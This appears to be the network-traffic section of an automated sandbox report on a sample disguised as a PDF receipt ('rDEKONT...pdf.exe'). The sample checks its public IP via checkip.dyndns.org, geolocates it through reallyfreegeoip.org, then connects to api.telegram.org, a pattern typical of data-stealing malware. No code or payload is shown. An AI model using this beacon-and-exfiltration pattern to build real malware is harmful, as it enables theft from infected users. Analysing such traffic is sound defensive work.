                                                                                                              Jan 15, 2025 04:02:05.811814070 CET44349721104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:02:05.811906099 CET49721443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:02:05.812139988 CET49721443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:02:05.812150955 CET44349721104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:02:05.865010977 CET4972080192.168.2.5193.122.6.168
                                                                                                              Jan 15, 2025 04:02:06.263942003 CET44349721104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:02:06.265682936 CET49721443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:02:06.265712023 CET44349721104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:02:06.445568085 CET44349721104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:02:06.445657015 CET44349721104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:02:06.445727110 CET49721443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:02:06.446129084 CET49721443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:02:06.448869944 CET4972080192.168.2.5193.122.6.168
                                                                                                              Jan 15, 2025 04:02:06.449939966 CET4972280192.168.2.5193.122.6.168
                                                                                                              Jan 15, 2025 04:02:06.453855038 CET8049720193.122.6.168192.168.2.5
                                                                                                              Jan 15, 2025 04:02:06.453924894 CET4972080192.168.2.5193.122.6.168
                                                                                                              Jan 15, 2025 04:02:06.454756021 CET8049722193.122.6.168192.168.2.5
                                                                                                              Jan 15, 2025 04:02:06.454822063 CET4972280192.168.2.5193.122.6.168
                                                                                                              Jan 15, 2025 04:02:06.454889059 CET4972280192.168.2.5193.122.6.168
                                                                                                              Jan 15, 2025 04:02:06.459626913 CET8049722193.122.6.168192.168.2.5
                                                                                                              Jan 15, 2025 04:02:07.090585947 CET8049722193.122.6.168192.168.2.5
                                                                                                              Jan 15, 2025 04:02:07.092148066 CET49723443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:02:07.092212915 CET44349723104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:02:07.092308044 CET49723443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:02:07.092530012 CET49723443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:02:07.092541933 CET44349723104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:02:07.130615950 CET4972280192.168.2.5193.122.6.168
                                                                                                              Jan 15, 2025 04:02:07.565371990 CET44349723104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:02:07.566771030 CET49723443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:02:07.566791058 CET44349723104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:02:07.711591959 CET44349723104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:02:07.711663961 CET44349723104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:02:07.711726904 CET49723443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:02:07.712060928 CET49723443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:02:07.714698076 CET4972280192.168.2.5193.122.6.168
                                                                                                              Jan 15, 2025 04:02:07.715699911 CET4972480192.168.2.5193.122.6.168
                                                                                                              Jan 15, 2025 04:02:07.719731092 CET8049722193.122.6.168192.168.2.5
                                                                                                              Jan 15, 2025 04:02:07.719809055 CET4972280192.168.2.5193.122.6.168
                                                                                                              Jan 15, 2025 04:02:07.720664978 CET8049724193.122.6.168192.168.2.5
                                                                                                              Jan 15, 2025 04:02:07.720740080 CET4972480192.168.2.5193.122.6.168
                                                                                                              Jan 15, 2025 04:02:07.720810890 CET4972480192.168.2.5193.122.6.168
                                                                                                              Jan 15, 2025 04:02:07.725629091 CET8049724193.122.6.168192.168.2.5
                                                                                                              Jan 15, 2025 04:02:08.375472069 CET8049724193.122.6.168192.168.2.5
                                                                                                              Jan 15, 2025 04:02:08.376617908 CET49725443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:02:08.376645088 CET44349725104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:02:08.376708984 CET49725443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:02:08.376929045 CET49725443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:02:08.376944065 CET44349725104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:02:08.427474976 CET4972480192.168.2.5193.122.6.168
                                                                                                              Jan 15, 2025 04:02:08.844438076 CET44349725104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:02:08.846085072 CET49725443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:02:08.846120119 CET44349725104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:02:08.972209930 CET44349725104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:02:08.972369909 CET44349725104.21.96.1192.168.2.5
                                                                                                              Jan 15, 2025 04:02:08.972421885 CET49725443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:02:08.972835064 CET49725443192.168.2.5104.21.96.1
                                                                                                              Jan 15, 2025 04:02:09.002677917 CET4972480192.168.2.5193.122.6.168
                                                                                                              Jan 15, 2025 04:02:09.007720947 CET8049724193.122.6.168192.168.2.5
                                                                                                              Jan 15, 2025 04:02:09.007822990 CET4972480192.168.2.5193.122.6.168
                                                                                                              Jan 15, 2025 04:02:09.010353088 CET49726443192.168.2.5149.154.167.220
                                                                                                              Jan 15, 2025 04:02:09.010402918 CET44349726149.154.167.220192.168.2.5
                                                                                                              Jan 15, 2025 04:02:09.010469913 CET49726443192.168.2.5149.154.167.220
                                                                                                              Jan 15, 2025 04:02:09.010948896 CET49726443192.168.2.5149.154.167.220
                                                                                                              Jan 15, 2025 04:02:09.010965109 CET44349726149.154.167.220192.168.2.5
                                                                                                              Jan 15, 2025 04:02:09.654546022 CET44349726149.154.167.220192.168.2.5
                                                                                                              Jan 15, 2025 04:02:09.654624939 CET49726443192.168.2.5149.154.167.220
                                                                                                              Jan 15, 2025 04:02:09.666347027 CET49726443192.168.2.5149.154.167.220
                                                                                                              Jan 15, 2025 04:02:09.666364908 CET44349726149.154.167.220192.168.2.5
                                                                                                              Jan 15, 2025 04:02:09.666775942 CET44349726149.154.167.220192.168.2.5
                                                                                                              Jan 15, 2025 04:02:09.669616938 CET49726443192.168.2.5149.154.167.220
                                                                                                              Jan 15, 2025 04:02:09.711369991 CET44349726149.154.167.220192.168.2.5
                                                                                                              Jan 15, 2025 04:02:09.897419930 CET44349726149.154.167.220192.168.2.5
                                                                                                              Jan 15, 2025 04:02:09.897582054 CET44349726149.154.167.220192.168.2.5
                                                                                                              Jan 15, 2025 04:02:09.897660017 CET49726443192.168.2.5149.154.167.220
                                                                                                              Jan 15, 2025 04:02:09.901885986 CET49726443192.168.2.5149.154.167.220
                                                                                                              Jan 15, 2025 04:02:17.908447981 CET4971080192.168.2.5193.122.6.168

                                                                                                              UDP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Jan 15, 2025 04:01:56.511774063 CET6437353192.168.2.51.1.1.1
                                                                                                              Jan 15, 2025 04:01:56.518548965 CET53643731.1.1.1192.168.2.5
                                                                                                              Jan 15, 2025 04:01:58.161719084 CET6431553192.168.2.51.1.1.1
                                                                                                              Jan 15, 2025 04:01:58.168842077 CET53643151.1.1.1192.168.2.5
                                                                                                              Jan 15, 2025 04:02:09.002589941 CET6237153192.168.2.51.1.1.1
                                                                                                              Jan 15, 2025 04:02:09.009260893 CET53623711.1.1.1192.168.2.5

                                                                                                              DNS Queries

                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                              Jan 15, 2025 04:01:56.511774063 CET192.168.2.51.1.1.10xa0cfStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                              Jan 15, 2025 04:01:58.161719084 CET192.168.2.51.1.1.10x2db2Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                              Jan 15, 2025 04:02:09.002589941 CET192.168.2.51.1.1.10x4361Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                              DNS Answers

                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                              Jan 15, 2025 04:01:56.518548965 CET1.1.1.1192.168.2.50xa0cfNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                              Jan 15, 2025 04:01:56.518548965 CET1.1.1.1192.168.2.50xa0cfNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                              Jan 15, 2025 04:01:56.518548965 CET1.1.1.1192.168.2.50xa0cfNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                              Jan 15, 2025 04:01:56.518548965 CET1.1.1.1192.168.2.50xa0cfNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                              Jan 15, 2025 04:01:56.518548965 CET1.1.1.1192.168.2.50xa0cfNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                              Jan 15, 2025 04:01:56.518548965 CET1.1.1.1192.168.2.50xa0cfNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                              Jan 15, 2025 04:01:58.168842077 CET1.1.1.1192.168.2.50x2db2No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                              Jan 15, 2025 04:01:58.168842077 CET1.1.1.1192.168.2.50x2db2No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                              Jan 15, 2025 04:01:58.168842077 CET1.1.1.1192.168.2.50x2db2No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                              Jan 15, 2025 04:01:58.168842077 CET1.1.1.1192.168.2.50x2db2No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                              Jan 15, 2025 04:01:58.168842077 CET1.1.1.1192.168.2.50x2db2No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                              Jan 15, 2025 04:01:58.168842077 CET1.1.1.1192.168.2.50x2db2No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                              Jan 15, 2025 04:01:58.168842077 CET1.1.1.1192.168.2.50x2db2No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                              Jan 15, 2025 04:02:09.009260893 CET1.1.1.1192.168.2.50x4361No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                              HTTP Request Dependency Graph

                                                                                                              • reallyfreegeoip.org
                                                                                                              • api.telegram.org
                                                                                                              • checkip.dyndns.org

                                                                                                              HTTP Packets

                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              0192.168.2.549706193.122.6.16880320C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 15, 2025 04:01:56.534813881 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 15, 2025 04:01:57.449129105 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Wed, 15 Jan 2025 03:01:57 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                              Jan 15, 2025 04:01:57.724092007 CET127OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Jan 15, 2025 04:01:58.127423048 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Wed, 15 Jan 2025 03:01:58 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                              Jan 15, 2025 04:01:58.822112083 CET127OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Jan 15, 2025 04:01:59.242707014 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Wed, 15 Jan 2025 03:01:59 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              1192.168.2.549710193.122.6.16880320C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 15, 2025 04:01:59.847949028 CET127OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Jan 15, 2025 04:02:00.482542992 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Wed, 15 Jan 2025 03:02:00 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              2192.168.2.549713193.122.6.16880320C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 15, 2025 04:02:01.284048080 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 15, 2025 04:02:01.918989897 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Wed, 15 Jan 2025 03:02:01 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              3192.168.2.549716193.122.6.16880320C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 15, 2025 04:02:02.527822971 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 15, 2025 04:02:03.203757048 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Wed, 15 Jan 2025 03:02:03 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              4192.168.2.549718193.122.6.16880320C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 15, 2025 04:02:03.921000957 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 15, 2025 04:02:04.547422886 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Wed, 15 Jan 2025 03:02:04 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              5192.168.2.549720193.122.6.16880320C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 15, 2025 04:02:05.175487995 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 15, 2025 04:02:05.810555935 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Wed, 15 Jan 2025 03:02:05 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              6192.168.2.549722193.122.6.16880320C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 15, 2025 04:02:06.454889059 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 15, 2025 04:02:07.090585947 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Wed, 15 Jan 2025 03:02:06 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              7192.168.2.549724193.122.6.16880320C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 15, 2025 04:02:07.720810890 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 15, 2025 04:02:08.375472069 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Wed, 15 Jan 2025 03:02:08 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              HTTPS Proxied Packets

                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              0192.168.2.549708104.21.96.1443320C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-15 03:01:58 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-15 03:01:58 UTC853INHTTP/1.1 200 OK
                                                                                                              Date: Wed, 15 Jan 2025 03:01:58 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 2224907
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GPs3RRakPDCaUJpah53jw8PwJNqrArtmofIuokv8kCyi1JJXrD26G7fd6KdfFgc0k1D0igP9tkcENfLXdRy3DIWyhHSM1taoO%2BuuXOkp5opziCGF%2Fl5sb4XJWb1SiCS9pJFBKzMu"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 90229fd21a07c32e-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1523&min_rtt=1523&rtt_var=572&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1913499&cwnd=178&unsent_bytes=0&cid=c4197857d27e5765&ts=181&x=0"
                                                                                                              2025-01-15 03:01:58 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              1192.168.2.549709104.21.96.1443320C:\Users\user\Desktop\rDEKONT-1_15_2025__75kb__pdf.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-15 03:01:59 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                              Host: reallyfreegeoip.org
                                                                                                              2025-01-15 03:01:59 UTC863INHTTP/1.1 200 OK
                                                                                                              Date: Wed, 15 Jan 2025 03:01:59 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 362
                                                                                                              Connection: close
                                                                                                              Age: 2224908
                                                                                                              Cache-Control: max-age=31536000
                                                                                                              cf-cache-status: HIT
                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
